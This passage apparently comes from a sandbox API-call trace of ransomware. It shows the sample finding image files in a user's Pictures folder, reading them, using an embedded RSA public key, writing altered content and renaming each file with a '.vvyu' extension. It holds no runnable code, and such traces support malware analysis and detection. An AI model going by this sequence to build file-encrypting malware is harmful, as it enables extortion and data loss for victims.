hHeap=0x6a0000) returned 1 [0193.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0193.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0193.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0193.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0193.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f58 | out: hHeap=0x6a0000) returned 1 [0193.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0193.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fa0 | out: hHeap=0x6a0000) returned 1 [0193.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0193.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f40 | out: hHeap=0x6a0000) returned 1 [0193.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f10 | out: hHeap=0x6a0000) returned 1 [0193.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0193.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0193.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0193.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ef8 | out: hHeap=0x6a0000) returned 1 [0193.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42100 | out: hHeap=0x6a0000) returned 1 [0193.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0193.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0193.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0193.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0193.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0193.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0193.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0193.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0193.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0193.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0193.647] WriteFile (in: hFile=0x584, lpBuffer=0x2d49778*, nNumberOfBytesToWrite=0x10e5b, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d49778*, lpNumberOfBytesWritten=0x30ffb14*=0x10e5b, lpOverlapped=0x0) returned 1 [0193.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0193.648] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x10e60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.648] WriteFile (in: hFile=0x584, lpBuffer=0x6d5c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x6d5c88*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0193.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0193.649] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0193.649] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0193.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.649] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0193.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0193.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0193.649] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0193.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.650] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.650] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0193.650] CloseHandle (hObject=0x584) returned 1 [0193.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eaa30 [0193.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x890) returned 0x2d49778 [0193.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eaa30 | out: hHeap=0x6a0000) returned 1 [0193.652] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\P5pCqlWF\\vzsbld-s6.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\p5pcqlwf\\vzsbld-s6.bmp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\P5pCqlWF\\vzsbld-s6.bmp.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\p5pcqlwf\\vzsbld-s6.bmp.vvyu")) returned 1 [0193.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0193.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0193.654] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.656] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c2d920 | out: hHeap=0x6a0000) returned 1 [0193.656] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbab02f0, ftCreationTime.dwHighDateTime=0x1d89c16, ftLastAccessTime.dwLowDateTime=0x88af9530, ftLastAccessTime.dwHighDateTime=0x1d89cbd, ftLastWriteTime.dwLowDateTime=0x88af9530, ftLastWriteTime.dwHighDateTime=0x1d89cbd, nFileSizeHigh=0x0, nFileSizeLow=0x1890c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YwgWoXY4_d Sr.jpg", cAlternateFileName="YWGWOX~1.JPG")) returned 1 [0193.656] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.656] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa6) returned 0x2c2d920 [0193.656] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.657] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\P5pCqlWF\\YwgWoXY4_d Sr.jpg") returned=".jpg" [0193.657] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\P5pCqlWF\\YwgWoXY4_d Sr.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\p5pcqlwf\\ywgwoxy4_d sr.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0193.660] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=100620) returned 1 [0193.660] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0193.664] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x188e6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.664] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0193.665] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0193.666] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0193.666] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.666] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x1890c, lpOverlapped=0x0) returned 1 [0193.667] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0193.668] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.668] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.668] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6eaa30) returned 1 [0193.669] CryptCreateHash (in: hProv=0x6eaa30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0193.669] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.669] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0193.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0193.669] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0193.669] GetLastError () returned 0x0 [0193.669] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0193.669] CryptReleaseContext (hProv=0x6eaa30, dwFlags=0x0) returned 1 [0193.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0193.669] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0193.669] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0193.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0193.669] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0193.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0193.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0193.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18910) returned 0x2d49778 [0193.670] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.670] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0193.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0193.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0193.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0193.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d42100 [0193.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ef8 [0193.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d42148 [0193.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f10 [0193.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f40 [0193.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39fa0 [0193.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f58 [0193.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0193.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0193.671] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0193.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0193.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f40 | out: hHeap=0x6a0000) returned 1 [0193.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f58 | out: hHeap=0x6a0000) returned 1 [0193.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fa0 | out: hHeap=0x6a0000) returned 1 [0193.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0193.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39fa0 [0193.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0193.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39f58 [0193.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0193.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39f40 [0193.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0193.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x6d5c88 [0193.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0193.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0193.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0193.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0193.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0193.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0193.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0193.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f58 | out: hHeap=0x6a0000) returned 1 [0193.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0193.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f40 | out: hHeap=0x6a0000) returned 1 [0193.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0193.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0193.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fa0 | out: hHeap=0x6a0000) returned 1 [0193.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0193.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0193.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0193.674] GetCurrentThreadId () returned 0x264 [0193.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0193.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d45e50 [0193.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0193.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eaa30 [0193.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0193.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0193.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0193.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0193.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.675] GetCurrentThreadId () returned 0x264 [0193.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2c31700 [0193.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0193.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0193.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0193.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0193.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0193.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0193.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0193.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39fa0 [0193.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0193.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0193.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0193.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0193.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0193.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0193.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0193.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0193.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f40 [0193.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0193.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0193.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0193.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0193.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0193.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0193.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0193.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39f58 [0193.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0193.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0193.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0193.678] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f28 [0193.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0193.678] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39fb8 [0193.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0193.678] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0193.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0193.678] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f88 [0193.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0193.678] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f70 [0193.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0193.678] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39fd0 [0193.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f70 | out: hHeap=0x6a0000) returned 1 [0193.678] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39f70 [0193.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f88 | out: hHeap=0x6a0000) returned 1 [0193.678] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0193.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0193.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0193.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0193.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0193.679] HeapFree (in: hHeap=0x6a0000, 